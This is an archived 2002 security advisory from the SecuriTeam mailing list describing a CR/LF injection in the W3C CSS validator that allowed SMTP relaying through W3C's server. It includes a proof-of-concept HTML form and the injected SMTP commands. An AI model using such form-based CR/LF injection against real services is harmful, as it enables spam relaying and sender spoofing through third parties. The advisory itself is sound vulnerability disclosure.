[NEWS] W3C CSS Validator - Proxying Attack
From: support@securiteam.comDate: 09/16/02
- Previous message: support@securiteam.com: "[NEWS] Lycos HTMLGear Guestbook Script Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 16 Sep 2002 15:11:54 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
W3C CSS Validator - Proxying Attack
------------------------------------------------------------------------
SUMMARY
As we reported previously a vulnerability exists in the W3C HTML validator
that allows for cross-site scripting. The following shows a different
issue, where additional CR/LF (Carriage Return/Line Feed) can be inserted
into the FORM an attacker fills allowing him for example to send an email
through a third party site while masquerading as someone coming from W3C's
site (i.e. relaying through it).
DETAILS
Another vulnerability at the W3C, this time the CSS validator. A Cr/Lf
injection can be performed by creating a custom form:
<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>
And filling it in with something like:
[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@here.com
RCPT TO:you@somewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Lycos HTMLGear Guestbook Script Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|